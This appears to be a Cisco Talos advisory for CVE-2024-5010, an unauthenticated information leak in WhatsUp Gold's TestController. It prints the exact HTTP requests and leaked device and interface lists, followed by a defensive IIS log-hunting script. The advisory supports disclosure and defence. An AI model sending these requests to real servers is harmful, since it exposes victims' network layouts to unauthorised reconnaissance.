CVE-2024-5010
An information disclosure vulnerability exists in the TestController functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697
WhatsUp Gold - https://www.whatsupgold.com/
7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE-200 - Information Exposure
WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.
The TestController endpoint is available to unauthenticated users and it discloses sensitive information through certain actions.
One of the TestController actions that disclose sensitive information to unauthenticated users is Devices.
By sending the following request:
REQ
GET /NmConsole/Wug/Test/Devices HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.0.252/NmConsole/
An attacker can obtain the list of devices detected and monitored by WhatsUp Gold:
RESP
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=vgfdfd4wiw4ab505tf11yl0z; path=/; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 08 Dec 2023 16:05:05 GMT
Connection: close
Content-Length: 488
[{"id":1,"name":"DESKTOP-XXXX","bestState":6,"worstState":6},{"id":2,"name":"192.168.0.26","bestState":6,"worstState":6},{"id":3,"name":"192.168.0.1","bestState":6,"worstState":6},{"id":4,"name":"192.168.0.2","bestState":6,"worstState":6},{"id":5,"name":"192.168.0.20","bestState":6,"worstState":6},{"id":6,"name":"192.168.0.55","bestState":6,"worstState":6},{"id":7,"name":"192.168.0.186","bestState":10,"worstState":10}]
Exposing such sensitive information to an attacker without proper authentication can be leveraged and exploited in further attacks.
Another TestController action that discloses sensitive information to unauthenticated users is NetworkInterfaces.
By sending the following request:
REQ
GET /NmConsole/Wug/Test/NetworkInterfaces HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.0.252/NmConsole/
An attacker can obtain the list of network interfaces detected and monitored by WhatsUp Gold:
RESP
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=l1azryxvh4my4gm3zh23ieu4; path=/; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 08 Dec 2023 16:11:50 GMT
Connection: close
Content-Length: 249
[{"id":1,"name":"192.168.0.26"},{"id":2,"name":"192.168.0.252"},{"id":3,"name":"192.168.0.1"},{"id":4,"name":"192.168.0.2"},{"id":5,"name":"192.168.0.20"},{"id":6,"name":"192.168.0.55"},{"id":7,"name":"192.168.0.186"},{"id":8,"name":"192.168.0.56"}]
Exposing such sensitive information to an attacker without proper authentication can be leveraged and exploited in further attacks.
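Because both disclosures above are plain GET requests answered with HTTP 200, a defender can hunt for past exposure in the IIS logs of the WhatsUp Gold server. The following script is an added example written for this advisory, not code from Talos or Progress. It assumes IIS W3C extended logging with the default field set (`#Fields:` header present) and that the TestController is served under `/NmConsole/Wug/Test/` as shown in the requests above; the log records themselves are constructed for illustration, and the client address 192.168.0.77 is invented.

```python
"""Hunt IIS W3C logs for successful requests to the WhatsUp Gold TestController
actions (Devices, NetworkInterfaces) described in CVE-2024-5010.

Added example for this advisory; not Talos or Progress code. The sample log
below is constructed: only the server address and URL paths come from the
advisory's own request/response transcripts.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List, Optional

# Path prefix of the TestController as seen in the advisory's requests.
TEST_CONTROLLER_PREFIX = "/nmconsole/wug/test/"
# Actions the advisory shows returning data without authentication.
DISCLOSED_ACTIONS = {"devices", "networkinterfaces"}


@dataclass
class Hit:
    timestamp: str
    client_ip: str
    action: str
    status: int
    username: str  # IIS cs-username; "-" for anonymous requests


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields: Optional[List[str]] = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names follow the directive
            continue
        if line.startswith("#"):
            continue                    # #Software, #Version, #Date directives
        if fields is None:
            continue                    # no header yet; columns cannot be mapped
        values = line.split(" ")
        if len(values) != len(fields):
            continue                    # malformed record; skip rather than misalign
        yield dict(zip(fields, values))


def find_test_controller_hits(lines: Iterable[str]) -> List[Hit]:
    """Return every request whose URI stem falls under the TestController."""
    hits: List[Hit] = []
    for rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "").lower()   # IIS paths are case-insensitive
        if not stem.startswith(TEST_CONTROLLER_PREFIX):
            continue
        action = stem[len(TEST_CONTROLLER_PREFIX):].strip("/")
        try:
            status = int(rec.get("sc-status", "0"))
        except ValueError:
            status = 0
        hits.append(Hit(
            timestamp=f"{rec.get('date', '')} {rec.get('time', '')}",
            client_ip=rec.get("c-ip", "-"),
            action=action,
            status=status,
            username=rec.get("cs-username", "-"),
        ))
    return hits


def successful_disclosures(hits: List[Hit]) -> List[Hit]:
    """Keep only 200 responses for the actions the advisory shows leaking data."""
    return [h for h in hits if h.status == 200 and h.action in DISCLOSED_ACTIONS]


def disclosures_by_client(hits: List[Hit]) -> Dict[str, int]:
    """Count successful disclosures per client address for triage."""
    counts: Dict[str, int] = {}
    for h in successful_disclosures(hits):
        counts[h.client_ip] = counts.get(h.client_ip, 0) + 1
    return counts


# Constructed sample log (IIS encodes spaces in the User-Agent as '+').
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-12-08 16:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-12-08 16:05:05 192.168.0.252 GET /NmConsole/Wug/Test/Devices - 80 - 192.168.0.77 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 http://192.168.0.252/NmConsole/ 200 0 0 31
2023-12-08 16:06:12 192.168.0.252 GET /NmConsole/ - 80 - 192.168.0.31 Mozilla/5.0 - 200 0 0 15
2023-12-08 16:11:50 192.168.0.252 GET /NmConsole/Wug/Test/NetworkInterfaces - 80 - 192.168.0.77 curl/8.4.0 - 200 0 0 22
2023-12-08 16:12:03 192.168.0.252 GET /nmconsole/wug/test/devices - 80 - 192.168.0.77 curl/8.4.0 - 401 0 0 4
"""

if __name__ == "__main__":
    all_hits = find_test_controller_hits(SAMPLE_LOG.splitlines())
    for h in successful_disclosures(all_hits):
        print(f"{h.timestamp} {h.client_ip} {h.action} user={h.username}")
    print(disclosures_by_client(all_hits))
```

Note that with forms-based authentication `cs-username` is usually `-` for every request, so the username column alone does not tell an anonymous caller from a logged-in one; the path match plus a 200 status is the primary signal, and hits from addresses that never otherwise authenticate to the console deserve a closer look.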
2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.